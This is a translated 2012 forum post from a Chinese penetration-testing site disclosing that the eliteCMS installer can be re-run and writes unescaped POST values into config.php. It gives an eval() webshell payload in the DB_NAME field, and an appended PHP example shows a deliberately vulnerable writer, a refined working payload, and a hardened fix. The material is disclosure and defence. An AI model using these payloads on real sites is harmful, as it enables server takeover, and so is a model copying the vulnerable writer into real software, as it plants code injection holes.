中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: eliteCMS installer not locked after installation + one-liner webshell written via the installer

Author: admin    Time: 2012-11-18 13:59
eliteCMS's installer is not locked once installation has finished, so an attacker can re-run the installation simply by requesting the installer URL.

The second problem is that the installer can write a one-liner backdoor directly into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...snip...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // the session values below are interpolated unescaped into PHP source
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    // the generated source is written straight to config.php
    $writer = fopen($file, 'w');
...

Now look at the code that fills those session values:

// POST fields are copied into the session with no validation or escaping
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name POSTed is:

"?><?php eval($_POST[c]);?><?php

a one-liner backdoor is written into /admin/includes/config.php.
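The following is an added example, not code from eliteCMS or from the post above. It reproduces the installer's pattern (untrusted values interpolated into PHP source, no install lock) in a stand-alone script and places a hardened writer beside it: an install lock that stops the installer from running twice, an allow-list for the host, database and user names, and var_export() for every value so that quotes and backslashes become part of a PHP literal instead of ending it. All function, file and variable names are this example's own assumptions. The attacker input is constructed for the demo; its DB_NAME payload is a variant of the post's idea that first closes the open string and the define() call, chosen so the file the vulnerable writer produces stays syntactically valid PHP and the injected tags actually execute.

```php
<?php
// Added example, not code from eliteCMS or from the post. Function and file
// names are this example's own assumptions.

// 1. The installer's pattern: untrusted values interpolated straight into PHP
//    source text. A value containing a double quote or a PHP close tag changes
//    the program that config.php becomes.
function write_config_vulnerable(array $v): string
{
    $out  = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $out .= "define(\"$key\", \"{$v[$key]}\");\n";
    }
    $out .= "?>\n";
    return $out;
}

// 2. Hardened writer: refuses to run once the install lock exists, allow-lists
//    the identifier-like fields, and emits every value through var_export(),
//    so quotes and backslashes in the password are escaped inside a literal.
function write_config_hardened(array $v, string $lockFile): string
{
    if (file_exists($lockFile)) {
        throw new RuntimeException("already installed; delete $lockFile to re-run the installer");
    }
    $rules = [
        'DB_SERVER' => '/^[A-Za-z0-9.:_-]{1,253}$/',   // host[:port]
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',       // MySQL identifier subset
        'DB_USER'   => '/^[A-Za-z0-9_.-]{1,32}$/',
    ];
    foreach ($rules as $key => $re) {
        if (!isset($v[$key]) || !preg_match($re, $v[$key])) {
            throw new InvalidArgumentException("invalid $key");
        }
    }
    if (!isset($v['DB_PASS'])) {
        throw new InvalidArgumentException('missing DB_PASS');
    }
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $out .= 'define(' . var_export($key, true) . ', '
              . var_export((string) $v[$key], true) . ");\n";
    }
    return $out;   // no closing tag: nothing can leak as output after the config
}

// Writes config.php and creates the lock in one step, so a completed install
// cannot be repeated through the installer URL.
function finish_install(array $v, string $configFile, string $lockFile): void
{
    $config = write_config_hardened($v, $lockFile);
    if (file_put_contents($configFile, $config, LOCK_EX) === false) {
        throw new RuntimeException("cannot write $configFile");
    }
    file_put_contents($lockFile, date('c') . "\n", LOCK_EX);
}

// --- demonstration on constructed input -----------------------------------
$attacker = [
    'DB_SERVER' => 'localhost',
    // Constructed payload (this example's variant, not the post's exact string):
    // it closes the open string and the define() call first, so the generated
    // file remains valid PHP and the injected eval() tag really runs.
    'DB_NAME'   => '");?><?php eval($_POST[\'c\']);?><?php define("X", "',
    'DB_USER'   => 'root',
    'DB_PASS'   => 'p"ss\\word',
];

echo "--- vulnerable writer, attacker input ---\n";
echo write_config_vulnerable($attacker);

$dir  = sys_get_temp_dir() . '/elitecms_demo';
@mkdir($dir);
$conf = "$dir/config.php";
$lock = "$dir/install.lock";
@unlink($lock);

echo "--- hardened writer, attacker input ---\n";
try {
    finish_install($attacker, $conf, $lock);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

echo "--- hardened writer, normal input, then a second install attempt ---\n";
$clean = ['DB_SERVER' => 'localhost', 'DB_NAME' => 'elitecms',
          'DB_USER' => 'elite', 'DB_PASS' => 'p"ss\\word'];
finish_install($clean, $conf, $lock);
echo file_get_contents($conf);
try {
    finish_install($clean, $conf, $lock);
} catch (RuntimeException $e) {
    echo 'blocked: ', $e->getMessage(), "\n";
}
```

Run it with `php example.php`. The vulnerable writer turns the attacker's DB_NAME into the line `define("DB_NAME", "");?><?php eval($_POST['c']);?><?php define("X", "");`, which is a working one-liner shell inside an otherwise valid config file. The hardened writer rejects that value at the allow-list, writes the normal input with the password rendered as the literal `'p"ss\\word'`, and refuses the second install because the lock file now exists. The allow-list is the important part for the identifier fields; var_export() alone would keep the file valid but would still let an attacker pick an arbitrary database name, and the lock file is what removes the repeat-install path described in the post.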

Source: 中国网络渗透测试联盟 (https://cobjon.com/), Powered by Discuz! X3.2